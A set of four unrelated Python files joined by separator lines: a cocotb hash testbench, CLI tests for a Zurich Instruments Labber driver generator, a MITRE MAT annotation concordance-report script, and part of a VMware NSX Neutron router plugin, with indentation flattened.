import cocotb
from cocotb.clock import Clock
import cocotb.triggers as triggers
from cocotb.triggers import Timer
import hashes
import bit_handle as bh
report = open('report.txt','w')
@cocotb.test()
async def test(dut):
"""Try accessing the design."""
dut._log.info("Running test...")
cocotb.fork(Clock(dut.en, 2, units="ns").start())
fail = 0
dut.rst <= 1
await triggers.RisingEdge(dut.en)
await Timer(1, units="ns")
dut.rst <= 0
m = 0
v = []
for i in range(16384):
v.clear()
for j in range(7):
a = rc_model(m)
m += 1
v.insert(0,a)
expect = int.from_bytes(bh.arr_to_str(v),"big")
try:
if dut.out.value != expect:
fail = 1
report.write("When in = %X, out = %X, but I expect it = %X\n" %(i, int(dut.out.value), expect) )
except:
report.write("When in = %X, I expect it = %X, but out is unidentified\n" %(i, expect) )
await triggers.RisingEdge(dut.en)
await Timer(1, units="ns")
if fail == 0: report.write("------VERIFICATION SUCCEED------\n")
else: report.write("------VERIFICATION FAIL------\n")
dut._log.info("Running test...done")
report.close()
def rc_model(a):
n = hashes.rc(a)
return n
|
import tempfile
from unittest import mock
from unittest.mock import call
import pytest
from click.testing import CliRunner
from zhinst.labber.cli_script import main
from zhinst.labber import generate_labber_files
def test_cli_script_main():
runner = CliRunner()
result = runner.invoke(main, ["--help"])
assert result.exit_code == 0
def test_cli_script_setup_help():
runner = CliRunner()
result = runner.invoke(main, ["setup", "--help"])
assert result.exit_code == 0
@mock.patch(
"zhinst.labber.cli_script.generate_labber_files",
return_value=[["bar"], ["foo"]],
wraps=generate_labber_files,
)
@pytest.mark.parametrize(
"inp, outp",
[
(
["dev1234", "localhost"],
{
"device_id": "dev1234",
"server_host": "localhost",
"mode": "NORMAL",
"upgrade": False,
"server_port": None,
"hf2": False,
},
),
(
[
"dev1234",
"localhost",
"--server_port=812",
"--hf2",
"--upgrade",
"--mode=ADVANCED",
],
{
"device_id": "dev1234",
"server_host": "localhost",
"mode": "ADVANCED",
"upgrade": True,
"server_port": 812,
"hf2": True,
},
),
(
["dev1234", "localhost", "--server_port=812"],
{
"device_id": "dev1234",
"server_host": "localhost",
"mode": "NORMAL",
"upgrade": False,
"server_port": 812,
"hf2": False,
},
),
],
)
def test_cli_script_setup(mock_gen, inp, outp):
runner = CliRunner()
with tempfile.TemporaryDirectory() as tmpdirname:
result = runner.invoke(main, ["setup", tmpdirname] + inp)
calls = {"driver_directory": tmpdirname}
calls.update(outp)
mock_gen.assert_called_with(**calls)
assert result.exit_code == 0
assert (
result.output == "Generating Zurich Instruments Labber device drivers...\n"
"Generated file: bar\n"
"Upgraded file: foo\n"
)
@mock.patch("zhinst.labber.cli_script.generate_labber_files", return_value=[[], []])
def test_cli_script_no_files(mock_gen):
runner = CliRunner()
with tempfile.TemporaryDirectory() as tmpdirname:
result = runner.invoke(
main, ["setup", tmpdirname, "dev1234", "localhost", "--server_port=812"]
)
assert result.exit_code == 0
assert "Error: It appears that the driver already exists" in result.output
@mock.patch("zhinst.labber.cli_script.generate_labber_files")
def test_cli_script_setup_errors(mock_gen):
runner = CliRunner()
with tempfile.TemporaryDirectory() as tmpdirname:
command = ["setup"]
result = runner.invoke(main, command)
mock_gen.assert_not_called()
assert result.exit_code == 2
assert "Missing argument 'DRIVER_DIRECTORY'." in result.output
command = ["setup", tmpdirname]
result = runner.invoke(main, command)
mock_gen.assert_not_called()
assert result.exit_code == 2
assert "Missing argument 'DEVICE_ID'." in result.output
command = ["setup", tmpdirname, "dev123"]
result = runner.invoke(main, command)
mock_gen.assert_not_called()
assert result.exit_code == 2
assert "Error: Missing argument 'SERVER_HOST'." in result.output
|
#!MF_PYTHONBIN
# Copyright (C) 2010 The MITRE Corporation. See the toplevel
# file LICENSE for license terms.
import os, sys
MAT_PKG_PYLIB = "MF_MAT_PKG_PYLIB"
sys.path.insert(0, MAT_PKG_PYLIB)
# Must import MAT so that sys.path is enhanced.
import MAT
PLUGIN_DIR = MAT.PluginMgr.LoadPlugins()
#
# Toplevel
#
from MAT.Operation import CmdlineOpArgumentAggregator, OptionParser, OptionGroup
from MAT.Score import WriteableTable
parser = OptionParser(usage = "Usage: %prog [options]")
AGGREGATOR = CmdlineOpArgumentAggregator(parser)
CONCORDANCE_WINDOW = 32
def UsageError(msg):
global parser
print >> sys.stderr, msg
parser.print_help()
sys.exit(1)
def _fileTypeCallback(optionObj, flag, value, parser):
global AGGREGATOR
setattr(parser.values, optionObj.dest, value)
try:
cls = MAT.DocumentIO.getInputDocumentIOClass(value)
cls.addInputOptions(AGGREGATOR)
except KeyError:
UsageError("Error: file_type must be one of " + ", ".join(["'"+x+"'" for x in MAT.DocumentIO.allInputDocumentIO(exclusions = ['raw'])]))
group = OptionGroup(parser, "Core options")
group.add_option("--task",
metavar = "task",
dest = "task",
type = "string",
help = "name of the task to use. Obligatory if neither --content_annotations nor --content_annotations_all are provided, and more than one task is registered. Known tasks are: " + ", ".join(PLUGIN_DIR.keys()))
group.add_option("--content_annotations", dest = "content_annotations",
metavar = "label,label,...",
help = "Optional. If --task is not provided, the reporter requires additional, external information to determine which annotations are content annotations. Use this flag to provide a comma-separated sequence of annotation labels which should be treated as content annotations.")
group.add_option("--content_annotations_all",
action = "store_true",
help = "Optional. If neither --task nor --content_annotations are provided, this flag will cause all labels in the document to be treated as content annotations.")
group.add_option("--verbose", action = "store_true",
help = "If present, the tool will provide detailed information on its progress.")
parser.add_option_group(group)
group = OptionGroup(parser, "Input options")
group.add_option("--input_dir", dest = "input_dir", action = "append",
metavar = "dir",
help = "A directory, all of whose files will be reported on. Can be repeated. May be specified with --input_files.")
group.add_option("--input_files", dest = "input_files", action = "append",
metavar = "re",
help = "A glob-style pattern describing full pathnames to be reported on. May be specified with --input_dir. Can be repeated.")
group.add_option("--file_type", dest = "file_type",
type = "string",
action = "callback",
callback = _fileTypeCallback,
metavar = " | ".join(MAT.DocumentIO.allInputDocumentIO(exclusions = ['raw'])),
help = "The file type of the input. One of " + ", ".join(MAT.DocumentIO.allInputDocumentIO(exclusions = ['raw'])) + ". Default is mat-json.")
group.add_option("--encoding", dest = "encoding",
type = "string",
metavar = "encoding",
help = 'The encoding of the input. The default is the appropriate default for the file type.')
parser.add_option_group(group)
group = OptionGroup(parser, "Output options")
group.add_option("--output_dir", dest = "output_dir", metavar="dir",
help = "The output directory for the reports. Will be created if it doesn't exist. Required.")
group.add_option("--csv", dest = "csv", action = "store_true",
help = "Generate a CSV file in the output directory, with concordance-style data: file, location, content, left and right context, annotation label. At least one of this option and --txt must be provided.")
group.add_option("--txt", dest = "txt", action = "store_true",
help = "Generate a text file in the output directory, with concordance-style data, sorted first by annotation label and then by content. At least one of this option and --csv must be provided.")
group.add_option("--concordance_window", dest = "concordance_window", type = "int",
metavar = "chars",
help = "Use the specified value as the window size on each side of the concordance. Default is %d." % CONCORDANCE_WINDOW)
group.add_option("--omit_concordance_context", dest = "omit_concordance_context", action = "store_true",
help = "Omit the left and right concordance context from the output.")
group.add_option("--file_csv", dest = "file_csv", action = "store_true",
help = "Generate a separate CSV file consisting of file-level statistics such as file size in characters and number of annotations of each type.")
group.add_option("--interpolate_file_info", dest = "interpolate_file_info", action = "store_true",
help = "Instead of a separate CSV file for the file-level statistics, interpolate them into the concordance.")
group.add_option("--include_spanless", action = "store_true",
help = "By default, only spanned content annotations are produced. If this flag is present, spanless annotations (without position or left or right context, of course) will be included. If the spanless annotations refer to spanned annotations, the text context of the referred annotations will be inserted in the 'text' column.")
group.add_option("--partition_by_label", dest = "partition_by_label", action = "store_true",
help = "If present, in addition to the standard output file report.csv and/or report.txt, the tool will generate a separate spreadsheet for each label, with a column for each attribute.")
parser.add_option_group(group)
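# Example invocation (illustrative only: the script name and paths are
# placeholders; the flags are the ones defined in the option groups above):
#
#   <this_script> --task "My Task" --input_dir /path/to/annotated/docs \
#       --file_type mat-json --output_dir /path/to/reports --csv --txt \
#       --concordance_window 40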
# Make sure that the JSON arguments are always available.
_jsonIO = MAT.DocumentIO.getDocumentIOClass('mat-json')
_jsonIO.addInputOptions(AGGREGATOR)
options, args = parser.parse_args()
# Figure out the task. I need the task and config arguments, both, before
# I try to digest the rest of the command line.
allTasks = PLUGIN_DIR.getAllTasks()
TASK = None
CACHED_LABELS = None
if options.task is not None:
TASK = PLUGIN_DIR.getTask(options.task)
if TASK is None:
UsageError("Unknown task '%s'." % options.task)
CACHED_LABELS = TASK.getAnnotationTypesByCategory("content")
elif options.content_annotations:
CACHED_LABELS = [s.strip() for s in options.content_annotations.split(",")]
elif options.content_annotations_all:
pass
elif len(allTasks) == 1:
TASK = allTasks[0]
CACHED_LABELS = TASK.getAnnotationTypesByCategory("content")
else:
UsageError("Neither --task nor --content_annotations nor --content_annotations_all is specified, and more than one task is known.")
if args:
UsageError("Extra arguments found: %s" % " ".join(args))
if not (options.csv or options.txt):
UsageError("Either --csv or --txt must be provided.")
if not options.output_dir:
UsageError("--output_dir must be provided.")
elif os.path.exists(options.output_dir) and (not os.path.isdir(options.output_dir)):
UsageError("value of --output_dir exists, but is not a directory.")
# Finally, figure out the file list.
FILES = set()
import glob
if options.input_dir is not None:
for dir in options.input_dir:
if not os.path.isdir(dir):
print >> sys.stderr, "Warning: skipping nonexistent directory '%s'." % dir
continue
for elt in os.listdir(dir):
p = os.path.join(dir, elt)
if os.path.isfile(p):
FILES.add(p)
if options.input_files is not None:
for pat in options.input_files:
for elt in glob.glob(pat):
if os.path.isfile(elt):
FILES.add(elt)
if len(FILES) == 0:
UsageError("No files specified.")
if options.file_type is None:
options.file_type = 'mat-json'
kw = AGGREGATOR.convertToKW(options)
# "task" needs to be an actual object.
try:
del kw["task"]
except:
pass
IO_TYPE = MAT.DocumentIO.getDocumentIO(options.file_type, task = TASK, **kw)
DO_CONCORDANCE = not options.omit_concordance_context
if options.concordance_window is not None:
CONCORDANCE_WINDOW = options.concordance_window
reporter = MAT.Document.AnnotationReporter(partitionByLabel = options.partition_by_label)
reporter.addPosition(concordanceContext = DO_CONCORDANCE, concordanceWindow = CONCORDANCE_WINDOW)
# For each file, load the document using IO_TYPE, and extract the content
# annotations.
fileData = {}
allLabels = set()
for path in FILES:
if options.verbose:
print "Generating statistics for", path, "..."
basename = os.path.basename(path)
doc = IO_TYPE.readFromSource(path)
fileData[basename] = {"length": len(doc.signal)}
if CACHED_LABELS is not None:
aNames = CACHED_LABELS
else:
# Only if --content_annotations_all was provided.
aNames = doc.atypeRepository.keys()
allLabels.update(aNames)
fileData[basename]["annots"] = reporter.addDocument(doc, basename, aNames, includeSpanless = options.include_spanless)
if not os.path.exists(options.output_dir):
os.makedirs(options.output_dir)
if options.csv:
if options.verbose:
print "Generating main CSV file..."
headers, csvRows = reporter.getHeadersAndRows()
if options.interpolate_file_info:
# The basename will be first, because we used addDocument.
labelIndex = headers.index("label")
headers[1:1] = ["file_size", "count_for_label"]
finalRows = []
for r in csvRows:
file = r[0]
label = r[labelIndex]
fileInfo = fileData[file]
finalRows.append([file, fileInfo["length"], fileInfo["annots"][label]] + r[1:])
csvRows = finalRows
# Once we've interpolated the file info, the label is superfluous.
labelIndex = headers.index("label")
csvRows = [r[0:labelIndex] + r[labelIndex + 1:] for r in csvRows]
headers = headers[0:labelIndex] + headers[labelIndex+1:]
WriteableTable().writeCSV(os.path.join(options.output_dir, "report.csv"), headers, csvRows)
if options.partition_by_label:
for k, (headers, theseRows) in reporter.getPartitionedHeadersAndRows().items():
if options.verbose:
print "Generating CSV file for %s..." % k
WriteableTable().writeCSV(os.path.join(options.output_dir, "report_"+k+".csv"), headers, theseRows)
if options.txt:
if options.verbose:
print "Generating main text file..."
import codecs
# First, let's create the rows I'm working with. Remove newlines!
import re
NL_PAT = re.compile("[\n\r]")
def formatNL(sep, s):
if s is None:
return ""
else:
return NL_PAT.sub(sep, s)
def formatLoc(file, start, end):
if (start is None) or (end is None):
return file
else:
return "%s:%d-%d" % (file, start, end)
ignore, allRows = reporter.getHeadersAndRows()
if DO_CONCORDANCE:
if options.interpolate_file_info:
headers = ["Location", "File size", "#Annots", "Left context", "Text", "Label", "Right context"]
txtRows = [(formatLoc(file, start, end), str(fileData[file]["length"]),
str(fileData[file]["annots"][label]),
formatNL(" ", left),
formatNL(" ", text), description, formatNL(" ", right))
for (file, start, end, left, text, label, description, right) in allRows]
else:
headers = ["Location", "Left context", "Text", "Label", "Right context"]
txtRows = [(formatLoc(file, start, end), formatNL(", ", left),
formatNL(" ", text), description, formatNL(" ", right))
for (file, start, end, left, text, label, description, right) in allRows]
elif options.interpolate_file_info:
headers = ["Location", "File size", "#Annots", "Text", "Label"]
txtRows = [(formatLoc(file, start, end), str(fileData[file]["length"]),
str(fileData[file]["annots"][label]),
formatNL(" ", text), description)
for (file, start, end, text, label, description) in allRows]
else:
headers = ["Location", "Text", "Label"]
txtRows = [(formatLoc(file, start, end), formatNL(" ", text), description)
for (file, start, end, text, label, description) in allRows]
# Now, sometimes the overall line length is going to be enormous, thanks to
# very complex, recursive label descriptions. So I should test this.
skipIt = False
for row in txtRows:
if sum([len(s) for s in row]) > (6 * CONCORDANCE_WINDOW):
print >> sys.stderr, "Skipping main text file output because row length exceeds 6 * concordance window."
skipIt = True
break
if not skipIt:
fp = codecs.open(os.path.join(options.output_dir, "report.txt"), "w", 'utf-8')
fp.write(WriteableTable().format(headers, txtRows))
fp.close()
if options.partition_by_label:
for k, (origHeaders, theseRows) in reporter.getPartitionedHeadersAndRows().items():
if options.verbose:
print "Generating text file for %s..." % k
textIndex = origHeaders.index("text")
headers = ["Location", "ID"]
if DO_CONCORDANCE:
headers += ["Left context", "Text"]
rcIndex = origHeaders.index("right context")
headers += origHeaders[textIndex + 1:rcIndex]
headers.append("Right context")
txtRows = []
lcIndex = origHeaders.index("left context")
for row in theseRows:
file, start, end, aid, left, text = row[:6]
txtRows.append([formatLoc(file, start, end), str(aid), formatNL(", ", left), formatNL(" ", text)] + \
[s or "" for s in row[6:rcIndex]] + [formatNL(" ", row[rcIndex])])
else:
headers += ["Text"]
headers += origHeaders[textIndex + 1:]
txtRows = []
for row in theseRows:
file, start, end, aid, text = row[:5]
txtRows.append([formatLoc(file, start, end), str(aid), formatNL(" ", text)] + \
[s or "" for s in row[5:]])
skipIt = False
for row in txtRows:
if sum([len(s) for s in row]) > (6 * CONCORDANCE_WINDOW):
print >> sys.stderr, "Skipping text file output for %s because row length exceeds 6 * concordance window." % k
skipIt = True
break
if not skipIt:
fp = codecs.open(os.path.join(options.output_dir, "report_"+k+".txt"), "w", 'utf-8')
fp.write(WriteableTable().format(headers, txtRows))
fp.close()
if options.file_csv:
if options.verbose:
print "Generating file info CSV..."
labels = list(allLabels)
labels.sort()
WriteableTable().writeCSV(os.path.join(options.output_dir, "file_report.csv"), ("file", "file_size") + tuple(labels),
[(os.path.basename(path), fileData[os.path.basename(path)]["length"]) +
tuple([fileData[os.path.basename(path)]["annots"].get(label, 0) for label in labels])
for path in FILES])
if options.verbose:
print "Done."
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2013 VMware, Inc.
# All Rights Reserved
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
import netaddr
from oslo.config import cfg
from neutron.common import exceptions as n_exc
from neutron.db.firewall import firewall_db
from neutron.db import l3_db
from neutron.db.loadbalancer import loadbalancer_db
from neutron.db import routedserviceinsertion_db as rsi_db
from neutron.db.vpn import vpn_db
from neutron.extensions import firewall as fw_ext
from neutron.extensions import l3
from neutron.extensions import routedserviceinsertion as rsi
from neutron.extensions import vpnaas as vpn_ext
from neutron.openstack.common import excutils
from neutron.openstack.common import log as logging
from neutron.plugins.common import constants as service_constants
from neutron.plugins.vmware.api_client import exception as api_exc
from neutron.plugins.vmware.common import config # noqa
from neutron.plugins.vmware.common import exceptions as nsx_exc
from neutron.plugins.vmware.common import utils
from neutron.plugins.vmware.dbexts import servicerouter as sr_db
from neutron.plugins.vmware.dbexts import vcns_db
from neutron.plugins.vmware.dbexts import vcns_models
from neutron.plugins.vmware.extensions import servicerouter as sr
from neutron.plugins.vmware.nsxlib import router as routerlib
from neutron.plugins.vmware.nsxlib import switch as switchlib
from neutron.plugins.vmware.plugins import base
from neutron.plugins.vmware.vshield.common import constants as vcns_const
from neutron.plugins.vmware.vshield.common import exceptions
from neutron.plugins.vmware.vshield.tasks import constants as tasks_const
from neutron.plugins.vmware.vshield import vcns_driver
from sqlalchemy.orm import exc as sa_exc
LOG = logging.getLogger(__name__)
ROUTER_TYPE_BASIC = 1
ROUTER_TYPE_ADVANCED = 2
ROUTER_STATUS = [
service_constants.ACTIVE,
service_constants.DOWN,
service_constants.PENDING_CREATE,
service_constants.PENDING_DELETE,
service_constants.ERROR
]
ROUTER_STATUS_LEVEL = {
service_constants.ACTIVE: vcns_const.RouterStatus.ROUTER_STATUS_ACTIVE,
service_constants.DOWN: vcns_const.RouterStatus.ROUTER_STATUS_DOWN,
service_constants.PENDING_CREATE: (
vcns_const.RouterStatus.ROUTER_STATUS_PENDING_CREATE
),
service_constants.PENDING_DELETE: (
vcns_const.RouterStatus.ROUTER_STATUS_PENDING_DELETE
),
service_constants.ERROR: vcns_const.RouterStatus.ROUTER_STATUS_ERROR
}
class NsxAdvancedPlugin(sr_db.ServiceRouter_mixin,
base.NsxPluginV2,
rsi_db.RoutedServiceInsertionDbMixin,
firewall_db.Firewall_db_mixin,
loadbalancer_db.LoadBalancerPluginDb,
vpn_db.VPNPluginDb
):
supported_extension_aliases = (
base.NsxPluginV2.supported_extension_aliases + [
"service-router",
"routed-service-insertion",
"fwaas",
"lbaas",
"vpnaas"
])
# The service plugin cannot currently support pagination
__native_pagination_support = False
__native_sorting_support = False
def __init__(self):
super(NsxAdvancedPlugin, self).__init__()
self._super_create_ext_gw_port = (
self._port_drivers['create'][l3_db.DEVICE_OWNER_ROUTER_GW])
self._super_delete_ext_gw_port = (
self._port_drivers['delete'][l3_db.DEVICE_OWNER_ROUTER_GW])
self._port_drivers['create'][l3_db.DEVICE_OWNER_ROUTER_GW] = (
self._vcns_create_ext_gw_port)
self._port_drivers['delete'][l3_db.DEVICE_OWNER_ROUTER_GW] = (
self._vcns_delete_ext_gw_port)
# cache router type based on router id
self._router_type = {}
self.callbacks = VcnsCallbacks(self.safe_reference)
# load the vCNS driver
self._load_vcns_drivers()
# switchlib's create_lswitch needs to be replaced in order to proxy
# logical switch create requests to vcns
self._set_create_lswitch_proxy()
def _set_create_lswitch_proxy(self):
base.switchlib.create_lswitch = self._proxy_create_lswitch
def _proxy_create_lswitch(self, *args, **kwargs):
name, tz_config, tags = (
_process_base_create_lswitch_args(*args, **kwargs)
)
return self.vcns_driver.create_lswitch(
name, tz_config, tags=tags,
port_isolation=None, replication_mode=None)
def _load_vcns_drivers(self):
self.vcns_driver = vcns_driver.VcnsDriver(self.callbacks)
def _set_router_type(self, router_id, router_type):
self._router_type[router_id] = router_type
def _get_router_type(self, context=None, router_id=None, router=None):
if not router:
if router_id in self._router_type:
return self._router_type[router_id]
router = self._get_router(context, router_id)
LOG.debug(_("EDGE: router = %s"), router)
if router['nsx_attributes']['service_router']:
router_type = ROUTER_TYPE_ADVANCED
else:
router_type = ROUTER_TYPE_BASIC
self._set_router_type(router['id'], router_type)
return router_type
def _find_router_type(self, router):
is_service_router = router.get(sr.SERVICE_ROUTER, False)
if is_service_router:
return ROUTER_TYPE_ADVANCED
else:
return ROUTER_TYPE_BASIC
def _is_advanced_service_router(self, context=None, router_id=None,
router=None):
if router:
router_type = self._get_router_type(router=router)
else:
router_type = self._get_router_type(context, router_id)
return (router_type == ROUTER_TYPE_ADVANCED)
def _vcns_create_ext_gw_port(self, context, port_data):
router_id = port_data['device_id']
if not self._is_advanced_service_router(context, router_id):
self._super_create_ext_gw_port(context, port_data)
return
# NOP for Edge because currently the port will be created internally
# by VSM
LOG.debug(_("EDGE: _vcns_create_ext_gw_port"))
def _vcns_delete_ext_gw_port(self, context, port_data):
router_id = port_data['device_id']
if not self._is_advanced_service_router(context, router_id):
self._super_delete_ext_gw_port(context, port_data)
return
# NOP for Edge
LOG.debug(_("EDGE: _vcns_delete_ext_gw_port"))
def _get_external_attachment_info(self, context, router):
gw_port = router.gw_port
ipaddress = None
netmask = None
nexthop = None
if gw_port:
# gw_port may have multiple IPs, only configure the first one
if gw_port.get('fixed_ips'):
ipaddress = gw_port['fixed_ips'][0]['ip_address']
network_id = gw_port.get('network_id')
if network_id:
ext_net = self._get_network(context, network_id)
if not ext_net.external:
msg = (_("Network '%s' is not a valid external "
"network") % network_id)
raise n_exc.BadRequest(resource='router', msg=msg)
if ext_net.subnets:
ext_subnet = ext_net.subnets[0]
netmask = str(netaddr.IPNetwork(ext_subnet.cidr).netmask)
nexthop = ext_subnet.gateway_ip
return (ipaddress, netmask, nexthop)
def _get_external_gateway_address(self, context, router):
ipaddress, netmask, nexthop = self._get_external_attachment_info(
context, router)
return nexthop
def _vcns_update_static_routes(self, context, **kwargs):
router = kwargs.get('router')
if router is None:
router = self._get_router(context, kwargs['router_id'])
edge_id = kwargs.get('edge_id')
if edge_id is None:
binding = vcns_db.get_vcns_router_binding(context.session,
router['id'])
edge_id = binding['edge_id']
skippable = True
if 'nexthop' in kwargs:
nexthop = kwargs['nexthop']
# The default gateway and vnic config have dependencies; if we
# explicitly specify a nexthop change, tell the driver not to
# skip this route update
skippable = False
else:
nexthop = self._get_external_gateway_address(context,
router)
if 'subnets' in kwargs:
subnets = kwargs['subnets']
else:
subnets = self._find_router_subnets_cidrs(context.elevated(),
router['id'])
routes = []
for subnet in subnets:
routes.append({
'cidr': subnet,
'nexthop': vcns_const.INTEGRATION_LR_IPADDRESS.split('/')[0]
})
self.vcns_driver.update_routes(router['id'], edge_id, nexthop, routes,
skippable)
def _get_nat_rules(self, context, router):
fip_qry = context.session.query(l3_db.FloatingIP)
fip_db = fip_qry.filter_by(router_id=router['id']).all()
dnat = []
snat = []
for fip in fip_db:
if fip.fixed_port_id:
dnat.append({
'dst': fip.floating_ip_address,
'translated': fip.fixed_ip_address
})
gw_port = router.gw_port
if gw_port and router.enable_snat:
if gw_port.get('fixed_ips'):
snat_ip = gw_port['fixed_ips'][0]['ip_address']
subnets = self._find_router_subnets_cidrs(context.elevated(),
router['id'])
for subnet in subnets:
snat.append({
'src': subnet,
'translated': snat_ip
})
return (snat, dnat)
def _update_nat_rules(self, context, router):
snat, dnat = self._get_nat_rules(context, router)
binding = vcns_db.get_vcns_router_binding(context.session,
router['id'])
self.vcns_driver.update_nat_rules(router['id'],
binding['edge_id'],
snat, dnat)
def _update_interface(self, context, router, sync=False):
addr, mask, nexthop = self._get_external_attachment_info(
context, router)
secondary = []
fip_qry = context.session.query(l3_db.FloatingIP)
fip_db = fip_qry.filter_by(router_id=router['id']).all()
for fip in fip_db:
if fip.fixed_port_id:
secondary.append(fip.floating_ip_address)
#Add all vip addresses bound on the router
vip_addrs = self._get_all_vip_addrs_by_router_id(context,
router['id'])
secondary.extend(vip_addrs)
binding = vcns_db.get_vcns_router_binding(context.session,
router['id'])
task = self.vcns_driver.update_interface(
router['id'], binding['edge_id'],
vcns_const.EXTERNAL_VNIC_INDEX,
self.vcns_driver.external_network,
addr, mask, secondary=secondary)
if sync:
task.wait(tasks_const.TaskState.RESULT)
def _update_router_gw_info(self, context, router_id, info):
if not self._is_advanced_service_router(context, router_id):
super(NsxAdvancedPlugin, self)._update_router_gw_info(
context, router_id, info)
return
# get original gw_port config
router = self._get_router(context, router_id)
org_ext_net_id = router.gw_port_id and router.gw_port.network_id
org_enable_snat = router.enable_snat
orgaddr, orgmask, orgnexthop = self._get_external_attachment_info(
context, router)
super(base.NsxPluginV2, self)._update_router_gw_info(
context, router_id, info, router=router)
new_ext_net_id = router.gw_port_id and router.gw_port.network_id
new_enable_snat = router.enable_snat
newaddr, newmask, newnexthop = self._get_external_attachment_info(
context, router)
binding = vcns_db.get_vcns_router_binding(context.session, router_id)
if new_ext_net_id != org_ext_net_id and orgnexthop:
# network changed, need to remove default gateway before vnic
# can be configured
LOG.debug(_("VCNS: delete default gateway %s"), orgnexthop)
self._vcns_update_static_routes(context,
router=router,
edge_id=binding['edge_id'],
nexthop=None)
if orgaddr != newaddr or orgmask != newmask:
self.vcns_driver.update_interface(
router_id, binding['edge_id'],
vcns_const.EXTERNAL_VNIC_INDEX,
self.vcns_driver.external_network,
newaddr, newmask)
if orgnexthop != newnexthop:
self._vcns_update_static_routes(context,
router=router,
edge_id=binding['edge_id'],
nexthop=newnexthop)
if (new_ext_net_id == org_ext_net_id and
org_enable_snat == new_enable_snat):
return
self._update_nat_rules(context, router)
def _add_subnet_snat_rule(self, context, router, subnet):
# NOP for service router
if not self._is_advanced_service_router(router=router):
super(NsxAdvancedPlugin, self)._add_subnet_snat_rule(
context, router, subnet)
def _delete_subnet_snat_rule(self, context, router, subnet):
# NOP for service router
if not self._is_advanced_service_router(router=router):
super(NsxAdvancedPlugin, self)._delete_subnet_snat_rule(
context, router, subnet)
def _remove_floatingip_address(self, context, fip_db):
# NOP for service router
router_id = fip_db.router_id
if not self._is_advanced_service_router(context, router_id):
super(NsxAdvancedPlugin, self)._remove_floatingip_address(
context, fip_db)
def _create_advanced_service_router(self, context, neutron_router_id,
name, lrouter, lswitch):
# store binding
binding = vcns_db.add_vcns_router_binding(
context.session, neutron_router_id, None, lswitch['uuid'],
service_constants.PENDING_CREATE)
# deploy edge
jobdata = {
'neutron_router_id': neutron_router_id,
'lrouter': lrouter,
'lswitch': lswitch,
'context': context
}
        # deploy and wait until the deploy request has been submitted,
# so we will have edge_id ready. The wait here should be fine
# as we're not in a database transaction now
self.vcns_driver.deploy_edge(
lrouter['uuid'], name, lswitch['uuid'], jobdata=jobdata,
wait_for_exec=True)
return binding
def _create_integration_lswitch(self, tenant_id, name):
        # use default transport zone
transport_zone_config = [{
"zone_uuid": self.cluster.default_tz_uuid,
"transport_type": cfg.CONF.NSX.default_transport_type
}]
return self.vcns_driver.create_lswitch(name, transport_zone_config)
def _add_router_integration_interface(self, tenant_id, name,
lrouter, lswitch):
# create logic switch port
try:
ls_port = switchlib.create_lport(
self.cluster, lswitch['uuid'], tenant_id,
'', '', lrouter['uuid'], True)
except api_exc.NsxApiException:
msg = (_("An exception occurred while creating a port "
"on lswitch %s") % lswitch['uuid'])
LOG.exception(msg)
raise n_exc.NeutronException(message=msg)
# create logic router port
try:
neutron_port_id = ''
pname = name[:36] + '-lp'
admin_status_enabled = True
lr_port = routerlib.create_router_lport(
self.cluster, lrouter['uuid'], tenant_id,
neutron_port_id, pname, admin_status_enabled,
[vcns_const.INTEGRATION_LR_IPADDRESS])
except api_exc.NsxApiException:
msg = (_("Unable to create port on NSX logical router %s") % name)
LOG.exception(msg)
switchlib.delete_port(
self.cluster, lswitch['uuid'], ls_port['uuid'])
raise n_exc.NeutronException(message=msg)
# attach logic router port to switch port
try:
self._update_router_port_attachment(
self.cluster, None, lrouter['uuid'], {}, lr_port['uuid'],
'PatchAttachment', ls_port['uuid'], None)
except api_exc.NsxApiException as e:
# lr_port should have been deleted
switchlib.delete_port(
self.cluster, lswitch['uuid'], ls_port['uuid'])
raise e
def _create_lrouter(self, context, router, nexthop):
lrouter = super(NsxAdvancedPlugin, self)._create_lrouter(
context, router, vcns_const.INTEGRATION_EDGE_IPADDRESS)
router_type = self._find_router_type(router)
self._set_router_type(lrouter['uuid'], router_type)
if router_type == ROUTER_TYPE_BASIC:
return lrouter
tenant_id = self._get_tenant_id_for_create(context, router)
name = router['name']
try:
lsname = name[:36] + '-ls'
lswitch = self._create_integration_lswitch(
tenant_id, lsname)
except Exception:
msg = _("Unable to create integration logic switch "
"for router %s") % name
LOG.exception(msg)
routerlib.delete_lrouter(self.cluster, lrouter['uuid'])
raise n_exc.NeutronException(message=msg)
try:
self._add_router_integration_interface(tenant_id, name,
lrouter, lswitch)
except Exception:
msg = _("Unable to add router interface to integration lswitch "
"for router %s") % name
LOG.exception(msg)
routerlib.delete_lrouter(self.cluster, lrouter['uuid'])
raise n_exc.NeutronException(message=msg)
try:
self._create_advanced_service_router(
context, router['id'], name, lrouter, lswitch)
except Exception:
msg = (_("Unable to create advance service router for %s") % name)
LOG.exception(msg)
            self.vcns_driver.delete_lswitch(lswitch['uuid'])
routerlib.delete_lrouter(self.cluster, lrouter['uuid'])
raise n_exc.NeutronException(message=msg)
lrouter['status'] = service_constants.PENDING_CREATE
return lrouter
def check_router_in_use(self, context, router_id):
router_filter = {'router_id': [router_id]}
vpnservices = self.get_vpnservices(
context, filters={'router_id': [router_id]})
if vpnservices:
raise vpn_ext.RouterInUseByVPNService(
router_id=router_id,
vpnservice_id=vpnservices[0]['id'])
vips = self.get_vips(
context, filters=router_filter)
if vips:
raise nsx_exc.RouterInUseByLBService(
router_id=router_id,
vip_id=vips[0]['id'])
firewalls = self.get_firewalls(
context, filters=router_filter)
if firewalls:
raise nsx_exc.RouterInUseByFWService(
router_id=router_id,
firewall_id=firewalls[0]['id'])
def check_router(self, context, router_id):
if not router_id:
msg = _("router_id is not provided!")
raise n_exc.BadRequest(resource='router', msg=msg)
router = self._get_router(context, router_id)
if not self._is_advanced_service_router(context, router=router):
msg = _("router_id:%s is not an advanced router!") % router['id']
raise n_exc.BadRequest(resource='router', msg=msg)
if router['status'] != service_constants.ACTIVE:
raise nsx_exc.AdvRouterServiceUnavailable(router_id=router['id'])
def _delete_lrouter(self, context, router_id, nsx_router_id):
binding = vcns_db.get_vcns_router_binding(context.session, router_id)
